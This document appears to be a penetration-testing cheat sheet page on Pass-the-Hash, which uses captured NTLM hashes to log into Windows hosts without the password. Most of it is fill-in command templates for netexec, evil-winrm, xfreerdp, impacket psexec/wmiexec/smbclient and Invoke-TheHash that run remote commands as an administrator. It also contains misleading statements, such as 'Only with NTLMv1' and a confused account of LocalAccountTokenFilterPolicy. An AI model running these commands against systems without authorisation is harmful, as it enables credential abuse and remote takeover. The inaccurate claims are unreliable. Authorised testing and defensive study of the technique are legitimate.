Pass The Hash

Only with NTLMv1.

It consists of passing hashes as passwords to log in, which is useful when password cracking has failed. It can be done on an Active Directory domain or on local accounts without passing the domain.

Requires an SMB connection, Windows File and Printer Sharing enabled, the ADMIN$ share available (all default settings on modern Windows Server systems) and a valid credentials with local administrative permissions.

This method works for Active Directory domain accounts and the built-in local administrator account. However, due to the 2014 security update, this technique cannot be used to authenticate as any other local admin account.

Tools

Details

netexec

nxc smb <IP> -d . -u <USER> -H <HASH> -x <COMMAND> nxc smb <IP> --local-auth -u <USER> -H <HASH> -x <COMMAND>

evil-winrm

evil-winrm -i <IP> -u <USER>[@<DOMAIN>] -H <HASH>

xfreerdp

xfreerdp /v:<IP> /u:<USER> /pth:<HASH> /dynamic-resolution

impacket-smbclient

smbclient //<IP>//<SHARE> -U <USER> --pw-nt-hash <HASH>

impacket-psexec

psexec -hashes <[LMHash]:NTHash> <USER>@<IP>

impacket-wmiexec

wmiexec -hashes <[LMHash]:NTHash> <USER>@<IP>

smbclient

smbclient -U <user> --pw-nt-hash //<IP>/<SHARE> > enter the hash instead of the password

Others impacket-scripts such as atexec, smbexec.

Invoke-TheHash

Invoke-SMBExec -Target <IP> [-Domain <DOMAIN>] -Username <USER> -Hash <HASH> -Command "<CMD>"

Invoke-WMIExec -Target <IP> [-Domain <DOMAIN>] -Username <USER> -Hash <HASH> -Command "<CMD>"

Invoke-SMBClient -Username <USER> -Hash <HASH> -Source \\server\share [-Action Get|Delete]

The user and hash we use for authentication must have administrative rights on the target computer, but if LocalAccountTokenFilterPolicy is set then only RID-500, “Administrator,” can perform remote administration tasks, if FilterAdministratorToken is also set neither can he. These settings are only for local administrative accounts.

Last updated 27 minutes ago

hashtagInvoke-TheHasharrow-up-right

Invoke-TheHash